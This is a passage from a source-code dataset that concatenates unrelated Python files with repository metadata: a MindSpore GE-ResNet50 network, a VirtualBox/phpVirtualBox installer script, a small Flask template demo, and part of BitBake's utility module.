    print("============================================================================================")


if __name__ == '__main__':
    train()
39.340996
131
0.517335
d48f1edc0948b830163a701f0e132ef9983eb689
11,775
py
Python
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/GENet_Res50/src/GENet.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""GENet: GE-ResNet50 backbone built from GEBlock, with Kaiming weight init."""
import math
import numpy as np
import mindspore.nn as nn
from mindspore.ops import operations as P
from mindspore.common.tensor import Tensor
from src.GEBlock import GEBlock


def calculate_gain(nonlinearity, param=None):
    """Return the weight-init gain for the given nonlinearity.

    Values: 1 for linear/conv*/sigmoid, 5/3 for tanh, sqrt(2) for relu,
    sqrt(2 / (1 + slope**2)) for leaky_relu (``param`` is the negative
    slope, default 0.01). Raises ValueError for anything else.
    """
    linear_fns = ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']
    res = 0
    if nonlinearity in linear_fns or nonlinearity == 'sigmoid':
        res = 1
    elif nonlinearity == 'tanh':
        res = 5.0 / 3
    elif nonlinearity == 'relu':
        res = math.sqrt(2.0)
    elif nonlinearity == 'leaky_relu':
        if param is None:
            negative_slope = 0.01
        # Precedence note: this parses as (not bool and int) or float,
        # so any float is accepted and bools are rejected.
        elif not isinstance(param, bool) and isinstance(param, int) or isinstance(param, float):
            # True/False are instances of int, hence check above
            negative_slope = param
        else:
            raise ValueError("negative_slope {} not a valid number".format(param))
        res = math.sqrt(2.0 / (1 + negative_slope ** 2))
    else:
        raise ValueError("Unsupported nonlinearity {}".format(nonlinearity))
    return res


def _calculate_fan_in_and_fan_out(tensor):
    """Compute (fan_in, fan_out) from a weight SHAPE sequence.

    Despite the name, ``tensor`` is a shape tuple/list (it is indexed and
    measured with len()), e.g. (out_ch, in_ch, kh, kw) for a conv weight.
    """
    dimensions = len(tensor)
    if dimensions < 2:
        raise ValueError("Fan in and fan out can not be computed for tensor" " with fewer than 2 dimensions")

    if dimensions == 2:  # Linear
        fan_in = tensor[1]
        fan_out = tensor[0]
    else:
        num_input_fmaps = tensor[1]
        num_output_fmaps = tensor[0]
        receptive_field_size = 1
        if dimensions > 2:
            # kh * kw; assumes a 4-D conv weight shape — higher ranks would
            # ignore trailing dims (TODO confirm only 2-D/4-D shapes are used)
            receptive_field_size = tensor[2] * tensor[3]
        fan_in = num_input_fmaps * receptive_field_size
        fan_out = num_output_fmaps * receptive_field_size
    return fan_in, fan_out


def _calculate_correct_fan(tensor, mode):
    """Select fan_in or fan_out of the shape per ``mode`` ('fan_in'/'fan_out')."""
    mode = mode.lower()
    valid_modes = ['fan_in', 'fan_out']
    if mode not in valid_modes:
        raise ValueError("Mode {} not supported, please use one of {}".format(mode, valid_modes))

    fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
    return fan_in if mode == 'fan_in' else fan_out


def kaiming_normal(inputs_shape, a=0, mode='fan_in', nonlinearity='leaky_relu'):
    """Kaiming-normal init: N(0, gain/sqrt(fan)) as a float32 numpy array."""
    fan = _calculate_correct_fan(inputs_shape, mode)
    gain = calculate_gain(nonlinearity, a)
    std = gain / math.sqrt(fan)
    return np.random.normal(0, std, size=inputs_shape).astype(np.float32)


def kaiming_uniform(inputs_shape, a=0., mode='fan_in', nonlinearity='leaky_relu'):
    """Kaiming-uniform init: U(-bound, bound) as a float32 numpy array."""
    fan = _calculate_correct_fan(inputs_shape, mode)
    gain = calculate_gain(nonlinearity, a)
    std = gain / math.sqrt(fan)
    bound = math.sqrt(3.0) * std  # Calculate uniform bounds from standard deviation
    return np.random.uniform(-bound, bound, size=inputs_shape).astype(np.float32)


def _conv3x3(in_channel, out_channel, stride=1):
    # 3x3 conv, 'same' padding, Kaiming-normal (fan_out, relu) weights.
    weight_shape = (out_channel, in_channel, 3, 3)
    weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu'))
    return nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=stride, padding=0, pad_mode='same', weight_init=weight)


def _conv1x1(in_channel, out_channel, stride=1):
    # 1x1 conv, 'same' padding, Kaiming-normal (fan_out, relu) weights.
    weight_shape = (out_channel, in_channel, 1, 1)
    weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu'))
    return nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride, padding=0, pad_mode='same', weight_init=weight)


def _conv7x7(in_channel, out_channel, stride=1):
    # 7x7 conv for the stem, 'same' padding, Kaiming-normal weights.
    weight_shape = (out_channel, in_channel, 7, 7)
    weight = Tensor(kaiming_normal(weight_shape, mode="fan_out", nonlinearity='relu'))
    return nn.Conv2d(in_channel, out_channel, kernel_size=7, stride=stride, padding=0, pad_mode='same', weight_init=weight)


def _bn(channel):
    # BatchNorm with gamma initialised to 1 (standard layers).
    return nn.BatchNorm2d(channel, eps=1e-4, momentum=0.95, gamma_init=1, beta_init=0, moving_mean_init=0, moving_var_init=1)


def _bn_last(channel):
    # BatchNorm with gamma initialised to 0 (zero-init variant for the last
    # BN of a residual branch).
    return nn.BatchNorm2d(channel, eps=1e-4, momentum=0.95, gamma_init=0, beta_init=0, moving_mean_init=0, moving_var_init=1)


def _fc(in_channel, out_channel):
    # Fully-connected classifier head, Kaiming-uniform weights (a=sqrt(5)).
    weight_shape = (out_channel, in_channel)
    weight = Tensor(kaiming_uniform(weight_shape, a=math.sqrt(5)))
    return nn.Dense(in_channel, out_channel, has_bias=True, weight_init=weight, bias_init=0)


class GENet(nn.Cell):
    """
    GENet architecture.

    Args:
        block (Cell): Block for network.
        layer_nums (list): Numbers of block in different layers.
        in_channels (list): Input channel in each layer.
        out_channels (list): Output channel in each layer.
        strides (list): Stride size in each layer.
        spatial(list): Numbers of output spatial size of different groups.
        num_classes (int): The number of classes that the training images are belonging to.
        extra_params(bool) : Whether to use DW Conv to down-sample
        mlp(bool) : Whether to combine SENet (using 1*1 conv)

    Returns:
        Tensor, output tensor.

    Examples:
        >>> GENet(GEBlock,
        >>>       [3, 4, 6, 3],
        >>>       [64, 256, 512, 1024],
        >>>       [256, 512, 1024, 2048],
        >>>       [1, 2, 2, 2],
        >>>       [56, 28, 14, 7],
        >>>       1001, True, True)
    """

    def __init__(self, block, layer_nums, in_channels, out_channels, strides, spatial, num_classes, extra_params, mlp):
        super(GENet, self).__init__()

        # The four lists describe the four residual stages; they must agree.
        if not len(layer_nums) == len(in_channels) == len(out_channels) == 4:
            raise ValueError("the length of layer_num, in_channels, out_channels list must be 4!")
        self.extra = extra_params
        # initial stage
        self.conv1 = _conv7x7(3, 64, stride=2)
        self.bn1 = _bn(64)
        self.relu = P.ReLU()
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode="same")

        # four GE stages, one _make_layer call per stage
        self.layer1 = self._make_layer(block=block, layer_num=layer_nums[0], in_channel=in_channels[0], out_channel=out_channels[0], stride=strides[0], spatial=spatial[0], extra_params=extra_params, mlp=mlp)
        self.layer2 = self._make_layer(block=block, layer_num=layer_nums[1], in_channel=in_channels[1], out_channel=out_channels[1], stride=strides[1], spatial=spatial[1], extra_params=extra_params, mlp=mlp)
        self.layer3 = self._make_layer(block=block, layer_num=layer_nums[2], in_channel=in_channels[2], out_channel=out_channels[2], stride=strides[2], spatial=spatial[2], extra_params=extra_params, mlp=mlp)
        self.layer4 = self._make_layer(block=block, layer_num=layer_nums[3], in_channel=in_channels[3], out_channel=out_channels[3], stride=strides[3], spatial=spatial[3], extra_params=extra_params, mlp=mlp)

        # global average pool (keep_dims for Flatten) + classifier head
        self.mean = P.ReduceMean(keep_dims=True)
        self.flatten = nn.Flatten()
        self.end_point = _fc(out_channels[3], num_classes)

    def _make_layer(self, block, layer_num, in_channel, out_channel, stride, spatial, extra_params, mlp):
        """
        Make stage network of GENet.

        Args:
            block (Cell): GENet block.
            layer_num (int): Layer number.
            in_channel (int): Input channel.
            out_channel (int): Output channel.
            stride (int): Stride size for the first convolutional layer.
            spatial(int): output spatial size of every block in same group.
            extra_params(bool) : Whether to use DW Conv to down-sample
            mlp(bool) : Whether to combine SENet (using 1*1 conv)

        Returns:
            SequentialCell, the output layer.
        """
        layers = []

        # first block of a stage carries the stride / channel change
        ge_block = block(in_channel=in_channel, out_channel=out_channel, stride=stride, spatial=spatial, extra_params=extra_params, mlp=mlp)
        layers.append(ge_block)

        # remaining blocks keep the shape (stride 1, out_channel -> out_channel)
        for _ in range(1, layer_num):
            ge_block = block(in_channel=out_channel, out_channel=out_channel, stride=1, spatial=spatial, extra_params=extra_params, mlp=mlp)
            layers.append(ge_block)

        return nn.SequentialCell(layers)

    def construct(self, x):
        """
        Forward pass.

        Args:
            x : input Tensor.
        """
        # initial stage
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        c1 = self.maxpool(x)

        # four groups
        c2 = self.layer1(c1)
        c3 = self.layer2(c2)
        c4 = self.layer3(c3)
        c5 = self.layer4(c4)

        # pool over spatial axes (H, W), flatten, classify
        out = self.mean(c5, (2, 3))
        out = self.flatten(out)
        out = self.end_point(out)

        return out


def GE_resnet50(class_num=1000, extra=True, mlp=True):
    """
    Get GE-ResNet50 neural network. Default : GE Theta+ version (best)

    Args:
        class_num (int): Class number.
        extra(bool) : Whether to use DW Conv to down-sample
        mlp(bool) : Whether to combine SENet (using 1*1 conv)

    Returns:
        Cell, cell instance of GENet-ResNet50 neural network.

    Examples:
        >>> net = GE_resnet50(1000)
    """
    return GENet(block=GEBlock, layer_nums=[3, 4, 6, 3], in_channels=[64, 256, 512, 1024], out_channels=[256, 512, 1024, 2048], strides=[1, 2, 2, 2], spatial=[56, 28, 14, 7], num_classes=class_num, extra_params=extra, mlp=mlp)
37.028302
98
0.552187
d4a2677671d9c96bb49b249f3b70ff6fcc9f9468
5,941
py
Python
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
5
2016-07-07T09:00:31.000Z
2017-03-09T22:46:33.000Z
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
null
null
null
LF6/vb.py
JohannesMuelle/workshops
af9140159e3872aff75864ced99b5163d7bba1ba
[ "CC0-1.0" ]
8
2016-05-13T14:29:06.000Z
2019-10-20T16:43:32.000Z
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Installer script: sets up VirtualBox 5.0 plus the phpVirtualBox web UI on
# a Debian/Ubuntu host via apt. Must run as root (useradd, apt, writes under
# /etc and /var/www). Each phase is wrapped in a broad try/except that only
# prints a failure message and continues — see NOTE(review) comments below.
import os, subprocess
import sys, traceback
import crypt

# Password for the vbox service user (the account VirtualBox runs under).
print("Dieses Skript installiert VirtualBox und phpVirtualBox auf dem System")
print("Es ist zu unterscheiden zwischen dem Benutzer unter dem die Anwendung läuft und dem Benutzer, der sich auf der Weboberfläche anmeldet.")
print("Die Anmeldung auf der Weboberfläche ist zu Beginn admin/admin und wird aufgerufen über IP/phpvirtualbox bzw. Servername/phpvirtualbox")
print("Sie werden jetzt nach dem Passwort gefragt für den Benutzer vbox. Der Benutzer vbox ist der Benutzer unter dem die Anwendung VirtualBox ausgeführt wird.")
print ( "This script installs VirtualBox and phpVirtualBox on the system")
print ( "It is necessary to distinguish between the user under which the application is running and the user who logs on to the web interface.")
print ( "The registration on the web interface is called at the beginning admin / admin and is under IP/phpvirtualbox or ServerName/phpvirtualbox")
print ( "You are now asked for the password for the user vbox. The user is the user vbox under which VirtualBox is running.")
print ("Please enter the password for the user vbox a:")
password = input("Bitte geben Sie das Passwort für den Benutzer vbox ein:")
# Single-quoted copy of the password: used later to replace the 'pass'
# placeholder inside phpVirtualBox's config.php.
pass1 = "'"+password+"'"

print("UPDATE")
try:
    cmd1 = os.system("apt-get -q -y update")
    cmd1 = os.system("apt-get -q -y upgrade")
except:
    # NOTE(review): os.system does not raise on non-zero exit, so this
    # except is effectively dead; failures are only visible in cmd1.
    print("Update fehlgeschlagen!")

try:
    # Install a few base tools needed by the later phases.
    print("Installation von einigen Basisprogrammen")
    cmd1 = os.system("apt -q -y install screen")
    cmd1 = os.system("apt -q -y install python-software-properties")
    cmd1 = os.system("apt -q -y install wget")
except:
    print("Installation fehlgeschlagen")

try:
    # Add the Oracle VirtualBox apt repository for this release codename.
    print("Repository hinzufügen")
    output = subprocess.check_output("lsb_release -sc", shell = True)
    lsb = str(output, 'utf-8').strip()
    cmd1 = os.system("add-apt-repository 'deb http://download.virtualbox.org/virtualbox/debian "+lsb+" contrib'")
    cmd1 = os.system("add-apt-repository --remove 'deb-src http://download.virtualbox.org/virtualbox/debian "+lsb+" contrib'")
    # The repository signing key changed starting with Ubuntu 16.04 (xenial).
    if lsb == "xenial":
        cmd1 = os.system("wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -")
    else:
        cmd1 = os.system("wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -")
    cmd1 = os.system("apt-get -q -y update")
except:
    # This phase is fatal: re-raise after reporting, since everything
    # below depends on the repository (and on the 'lsb' variable).
    print("Repository hinzufügen fehlgeschlagen")
    print("Unexpected error:", sys.exc_info()[0])
    raise

try:
    # Install VirtualBox, the matching kernel headers and the extension pack,
    # then create the 'vbox' service user with the entered password.
    print("Installation VirtualBox")
    output = subprocess.check_output("uname -r", shell = True)
    Kernel = str(output, 'utf-8').strip()
    cmd1 = os.system("apt-get install -q -y linux-headers-"+Kernel)
    cmd1 = os.system("apt-get install -q -y build-essential virtualbox-5.0 dkms")
    cmd1 = os.system("apt-get install -q -y --allow-unauthenticated virtualbox-5.0")
    cmd1 = os.system("apt-get install -q -y --allow-unauthenticated dkms >> vb.log")
    # "vboxmanage -v" prints e.g. "5.0.40r115130"; keep the part before 'r'
    # to build the extension-pack download URL.
    version = subprocess.check_output("vboxmanage -v", shell = True)
    version = str(version, 'utf-8').strip()
    version = version.split('r')
    version = version[0]
    cmd1 = os.system ("wget -q http://download.virtualbox.org/virtualbox/"+version+"/Oracle_VM_VirtualBox_Extension_Pack-"+version+".vbox-extpack")
    cmd1 = os.system("VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-"+version+".vbox-extpack")
    # crypt with a fixed 2-char salt ("22") — NOTE(review): weak legacy DES
    # hash and a constant salt; consider crypt.mksalt() instead.
    encPass = crypt.crypt(password,"22")
    cmd1 = os.system("useradd -m -p "+encPass+" vbox -G vboxusers")
except:
    print("Installation von VirtualBox fehlgeschlagen")

try:
    print("Installation von phpVirtualBox")
    print("Vorbereitung ...")
    # Create /etc/default/virtualbox and register the service user so the
    # vboxweb-service runs as 'vbox'.
    datei = open("/etc/default/virtualbox", "w")
    datei.write("VBOXWEB_USER=vbox")
    datei.close()
except:
    print("Installation von phpVirtualBox fehlgeschlagen")

try:
    # Install Apache + PHP (PHP 7.0 on xenial, PHP 5 otherwise), unpack
    # phpVirtualBox under /var/www/html and wire it to the vboxweb service.
    print("Web-Server installieren ..")
    if lsb == "xenial":
        cmd1 = os.system("apt-get -q -y install php7.0 apache2-utils")
        cmd1 = os.system("apt-get -q -y install php7.0-mysql")
        cmd1 = os.system("apt-get -q -y install apache2")
        cmd1 = os.system("apt-get -q -y install apache2-utils")
        # Extra modules needed from Ubuntu 16.04 on:
        # https://sourceforge.net/p/phpvirtualbox/discussion/help/thread/ae25b8e7/
        cmd1 = os.system("apt-get -q -y install php7.0-xml")
        cmd1 = os.system("apt-get -q -y install php-soap")
        cmd1 = os.system("apt-get -q -y install php7.0-soap")
        cmd1 = os.system("apt-get -q -y install libapache2-mod-php")
    else:
        cmd1 = os.system("apt-get -q -y install php5 php5-mysql")
        cmd1 = os.system("apt-get -q -y install apache2")
        cmd1 = os.system("apt-get -q -y install apache2-utils")
        cmd1 = os.system("apt-get -q -y install php5-mysql")
    cmd1 = os.system("wget -q 'http://sourceforge.net/projects/phpvirtualbox/files/latest/download' --content-disposition")
    cmd1 = os.system ("apt-get -q -y install unzip")
    # NOTE(review): assumes the download above produced exactly
    # phpvirtualbox-5.0-5.zip — breaks if "latest" moves on.
    cmd1 = os.system("unzip -q -o phpvirtualbox-5.0-5.zip -d /var/www/html")
    cmd1 = os.system("ln -s /var/www/html/phpvirtualbox-5.0-5 /var/www/html/phpvirtualbox")
    cmd1 = os.system("chown -R www-data.www-data /var/www")
    cmd1 = os.system("service vboxweb-service stop")
    cmd1 = os.system("/sbin/rcvboxdrv setup")
    cmd1 = os.system("service vboxweb-service start")
    cmd1 = os.system("cp /var/www/html/phpvirtualbox/config.php-example /var/www/html/phpvirtualbox/config.php")
    # Read config.php and splice the entered password in place of the
    # 'pass' placeholder, then write it back.
    f = open('/var/www/html/phpvirtualbox/config.php','r')
    filedata = f.read()
    f.close()
    newdata = filedata.replace("'pass'",pass1)
    f = open('/var/www/html/phpvirtualbox/config.php','w')
    f.write(newdata)
    f.close()
except:
    print("Web-Server fehlgeschlagen")
52.575221
161
0.693318
580130c4bf321de1ed7bba8034be178ca337fef7
229
py
Python
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
11-Templates/app.py
dikyindrah/Flask
96f3f2b0db12b362d439d0c064dfa392ee14ad12
[ "MIT" ]
null
null
null
# Minimal Flask demo: renders a template with a value taken from the URL.
from flask import Flask, render_template

app = Flask(__name__)


@app.route('/login/<username>')
def login(username):
    """Render login.html with the <username> path segment from the URL.

    'username' is passed through to the Jinja2 template as-is; the template
    file is resolved from the app's templates/ directory.
    """
    return render_template('login.html', username=username)


if __name__ == '__main__':
    # Debug mode enables the reloader and interactive traceback —
    # development only, not for production.
    app.run(debug=True)
22.9
59
0.729258
ed19825faf8d5dbb74205eefbdc8d1f7820340e1
53,137
py
Python
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
5
2019-11-11T07:57:26.000Z
2022-03-28T08:26:53.000Z
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
3
2019-09-05T21:47:07.000Z
2019-09-17T18:10:45.000Z
Contrib-Inspur/openbmc/poky/bitbake/lib/bb/utils.py
opencomputeproject/Rack-Manager
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
[ "MIT" ]
11
2019-07-20T00:16:32.000Z
2022-01-11T14:17:48.000Z
""" BitBake Utility Functions """ # Copyright (C) 2004 Michael Lauer # # SPDX-License-Identifier: GPL-2.0-only # import re, fcntl, os, string, stat, shutil, time import sys import errno import logging import bb import bb.msg import multiprocessing import fcntl import importlib from importlib import machinery import itertools import subprocess import glob import fnmatch import traceback import errno import signal import ast import collections import copy from subprocess import getstatusoutput from contextlib import contextmanager from ctypes import cdll logger = logging.getLogger("BitBake.Util") python_extensions = importlib.machinery.all_suffixes() def clean_context(): return { "os": os, "bb": bb, "time": time, } def get_context(): return _context def set_context(ctx): _context = ctx # Context used in better_exec, eval _context = clean_context() class VersionStringException(Exception): """Exception raised when an invalid version specification is found""" def explode_version(s): r = [] alpha_regexp = re.compile(r'^([a-zA-Z]+)(.*)$') numeric_regexp = re.compile(r'^(\d+)(.*)$') while (s != ''): if s[0] in string.digits: m = numeric_regexp.match(s) r.append((0, int(m.group(1)))) s = m.group(2) continue if s[0] in string.ascii_letters: m = alpha_regexp.match(s) r.append((1, m.group(1))) s = m.group(2) continue if s[0] == '~': r.append((-1, s[0])) else: r.append((2, s[0])) s = s[1:] return r def split_version(s): """Split a version string into its constituent parts (PE, PV, PR)""" s = s.strip(" <>=") e = 0 if s.count(':'): e = int(s.split(":")[0]) s = s.split(":")[1] r = "" if s.count('-'): r = s.rsplit("-", 1)[1] s = s.rsplit("-", 1)[0] v = s return (e, v, r) def vercmp_part(a, b): va = explode_version(a) vb = explode_version(b) while True: if va == []: (oa, ca) = (0, None) else: (oa, ca) = va.pop(0) if vb == []: (ob, cb) = (0, None) else: (ob, cb) = vb.pop(0) if (oa, ca) == (0, None) and (ob, cb) == (0, None): return 0 if oa < ob: return -1 elif oa > ob: return 1 elif 
ca is None: return -1 elif cb is None: return 1 elif ca < cb: return -1 elif ca > cb: return 1 def vercmp(ta, tb): (ea, va, ra) = ta (eb, vb, rb) = tb r = int(ea or 0) - int(eb or 0) if (r == 0): r = vercmp_part(va, vb) if (r == 0): r = vercmp_part(ra, rb) return r def vercmp_string(a, b): ta = split_version(a) tb = split_version(b) return vercmp(ta, tb) def vercmp_string_op(a, b, op): """ Compare two versions and check if the specified comparison operator matches the result of the comparison. This function is fairly liberal about what operators it will accept since there are a variety of styles depending on the context. """ res = vercmp_string(a, b) if op in ('=', '=='): return res == 0 elif op == '<=': return res <= 0 elif op == '>=': return res >= 0 elif op in ('>', '>>'): return res > 0 elif op in ('<', '<<'): return res < 0 elif op == '!=': return res != 0 else: raise VersionStringException('Unsupported comparison operator "%s"' % op) def explode_deps(s): """ Take an RDEPENDS style string of format: "DEPEND1 (optional version) DEPEND2 (optional version) ..." and return a list of dependencies. Version information is ignored. """ r = [] l = s.split() flag = False for i in l: if i[0] == '(': flag = True #j = [] if not flag: r.append(i) #else: # j.append(i) if flag and i.endswith(')'): flag = False # Ignore version #r[-1] += ' ' + ' '.join(j) return r def explode_dep_versions2(s, *, sort=True): """ Take an RDEPENDS style string of format: "DEPEND1 (optional version) DEPEND2 (optional version) ..." and return a dictionary of dependencies and versions. """ r = collections.OrderedDict() l = s.replace(",", "").split() lastdep = None lastcmp = "" lastver = "" incmp = False inversion = False for i in l: if i[0] == '(': incmp = True i = i[1:].strip() if not i: continue if incmp: incmp = False inversion = True # This list is based on behavior and supported comparisons from deb, opkg and rpm. 
# # Even though =<, <<, ==, !=, =>, and >> may not be supported, # we list each possibly valid item. # The build system is responsible for validation of what it supports. if i.startswith(('<=', '=<', '<<', '==', '!=', '>=', '=>', '>>')): lastcmp = i[0:2] i = i[2:] elif i.startswith(('<', '>', '=')): lastcmp = i[0:1] i = i[1:] else: # This is an unsupported case! raise VersionStringException('Invalid version specification in "(%s" - invalid or missing operator' % i) lastcmp = (i or "") i = "" i.strip() if not i: continue if inversion: if i.endswith(')'): i = i[:-1] or "" inversion = False if lastver and i: lastver += " " if i: lastver += i if lastdep not in r: r[lastdep] = [] r[lastdep].append(lastcmp + " " + lastver) continue #if not inversion: lastdep = i lastver = "" lastcmp = "" if not (i in r and r[i]): r[lastdep] = [] if sort: r = collections.OrderedDict(sorted(r.items(), key=lambda x: x[0])) return r def explode_dep_versions(s): r = explode_dep_versions2(s) for d in r: if not r[d]: r[d] = None continue if len(r[d]) > 1: bb.warn("explode_dep_versions(): Item %s appeared in dependency string '%s' multiple times with different values. explode_dep_versions cannot cope with this." 
% (d, s)) r[d] = r[d][0] return r def join_deps(deps, commasep=True): """ Take the result from explode_dep_versions and generate a dependency string """ result = [] for dep in deps: if deps[dep]: if isinstance(deps[dep], list): for v in deps[dep]: result.append(dep + " (" + v + ")") else: result.append(dep + " (" + deps[dep] + ")") else: result.append(dep) if commasep: return ", ".join(result) else: return " ".join(result) def _print_trace(body, line): """ Print the Environment of a Text Body """ error = [] # print the environment of the method min_line = max(1, line-4) max_line = min(line + 4, len(body)) for i in range(min_line, max_line + 1): if line == i: error.append(' *** %.4d:%s' % (i, body[i-1].rstrip())) else: error.append(' %.4d:%s' % (i, body[i-1].rstrip())) return error def better_compile(text, file, realfile, mode = "exec", lineno = 0): """ A better compile method. This method will print the offending lines. """ try: cache = bb.methodpool.compile_cache(text) if cache: return cache # We can't add to the linenumbers for compile, we can pad to the correct number of blank lines though text2 = "\n" * int(lineno) + text code = compile(text2, realfile, mode) bb.methodpool.compile_cache_add(text, code) return code except Exception as e: error = [] # split the text into lines again body = text.split('\n') error.append("Error in compiling python function in %s, line %s:\n" % (realfile, e.lineno)) if hasattr(e, "lineno"): error.append("The code lines resulting in this error were:") # e.lineno: line's position in reaflile # lineno: function name's "position -1" in realfile # e.lineno - lineno: line's relative position in function error.extend(_print_trace(body, e.lineno - lineno)) else: error.append("The function causing this error was:") for line in body: error.append(line) error.append("%s: %s" % (e.__class__.__name__, str(e))) logger.error("\n".join(error)) e = bb.BBHandledException(e) raise e def _print_exception(t, value, tb, realfile, text, context): error = 
[] try: exception = traceback.format_exception_only(t, value) error.append('Error executing a python function in %s:\n' % realfile) # Strip 'us' from the stack (better_exec call) unless that was where the # error came from if tb.tb_next is not None: tb = tb.tb_next textarray = text.split('\n') linefailed = tb.tb_lineno tbextract = traceback.extract_tb(tb) tbformat = traceback.format_list(tbextract) error.append("The stack trace of python calls that resulted in this exception/failure was:") error.append("File: '%s', lineno: %s, function: %s" % (tbextract[0][0], tbextract[0][1], tbextract[0][2])) error.extend(_print_trace(textarray, linefailed)) # See if this is a function we constructed and has calls back into other functions in # "text". If so, try and improve the context of the error by diving down the trace level = 0 nexttb = tb.tb_next while nexttb is not None and (level+1) < len(tbextract): error.append("File: '%s', lineno: %s, function: %s" % (tbextract[level+1][0], tbextract[level+1][1], tbextract[level+1][2])) if tbextract[level][0] == tbextract[level+1][0] and tbextract[level+1][2] == tbextract[level][0]: # The code was possibly in the string we compiled ourselves error.extend(_print_trace(textarray, tbextract[level+1][1])) elif tbextract[level+1][0].startswith("/"): # The code looks like it might be in a file, try and load it try: with open(tbextract[level+1][0], "r") as f: text = f.readlines() error.extend(_print_trace(text, tbextract[level+1][1])) except: error.append(tbformat[level+1]) else: error.append(tbformat[level+1]) nexttb = tb.tb_next level = level + 1 error.append("Exception: %s" % ''.join(exception)) # If the exception is from spwaning a task, let's be helpful and display # the output (which hopefully includes stderr). 
if isinstance(value, subprocess.CalledProcessError) and value.output: error.append("Subprocess output:") error.append(value.output.decode("utf-8", errors="ignore")) finally: logger.error("\n".join(error)) def better_exec(code, context, text = None, realfile = "<code>", pythonexception=False): """ Similiar to better_compile, better_exec will print the lines that are responsible for the error. """ import bb.parse if not text: text = code if not hasattr(code, "co_filename"): code = better_compile(code, realfile, realfile) try: exec(code, get_context(), context) except (bb.BBHandledException, bb.parse.SkipRecipe, bb.build.FuncFailed, bb.data_smart.ExpansionError): # Error already shown so passthrough, no need for traceback raise except Exception as e: if pythonexception: raise (t, value, tb) = sys.exc_info() try: _print_exception(t, value, tb, realfile, text, context) except Exception as e: logger.error("Exception handler error: %s" % str(e)) e = bb.BBHandledException(e) raise e def simple_exec(code, context): exec(code, get_context(), context) def better_eval(source, locals, extraglobals = None): ctx = get_context() if extraglobals: ctx = copy.copy(ctx) for g in extraglobals: ctx[g] = extraglobals[g] return eval(source, ctx, locals) @contextmanager def fileslocked(files): """Context manager for locking and unlocking file locks.""" locks = [] if files: for lockfile in files: locks.append(bb.utils.lockfile(lockfile)) yield for lock in locks: bb.utils.unlockfile(lock) @contextmanager def timeout(seconds): def timeout_handler(signum, frame): pass original_handler = signal.signal(signal.SIGALRM, timeout_handler) try: signal.alarm(seconds) yield finally: signal.alarm(0) signal.signal(signal.SIGALRM, original_handler) def lockfile(name, shared=False, retry=True, block=False): """ Use the specified file as a lock file, return when the lock has been acquired. Returns a variable to pass to unlockfile(). 
Parameters: retry: True to re-try locking if it fails, False otherwise block: True to block until the lock succeeds, False otherwise The retry and block parameters are kind of equivalent unless you consider the possibility of sending a signal to the process to break out - at which point you want block=True rather than retry=True. """ dirname = os.path.dirname(name) mkdirhier(dirname) if not os.access(dirname, os.W_OK): logger.error("Unable to acquire lock '%s', directory is not writable", name) sys.exit(1) op = fcntl.LOCK_EX if shared: op = fcntl.LOCK_SH if not retry and not block: op = op | fcntl.LOCK_NB while True: # If we leave the lockfiles lying around there is no problem # but we should clean up after ourselves. This gives potential # for races though. To work around this, when we acquire the lock # we check the file we locked was still the lock file on disk. # by comparing inode numbers. If they don't match or the lockfile # no longer exists, we start again. # This implementation is unfair since the last person to request the # lock is the most likely to win it. try: lf = open(name, 'a+') fileno = lf.fileno() fcntl.flock(fileno, op) statinfo = os.fstat(fileno) if os.path.exists(lf.name): statinfo2 = os.stat(lf.name) if statinfo.st_ino == statinfo2.st_ino: return lf lf.close() except OSError as e: if e.errno == errno.EACCES: logger.error("Unable to acquire lock '%s', %s", e.strerror, name) sys.exit(1) try: lf.close() except Exception: pass pass if not retry: return None def unlockfile(lf): """ Unlock a file locked using lockfile() """ try: # If we had a shared lock, we need to promote to exclusive before # removing the lockfile. Attempt this, ignore failures. fcntl.flock(lf.fileno(), fcntl.LOCK_EX|fcntl.LOCK_NB) os.unlink(lf.name) except 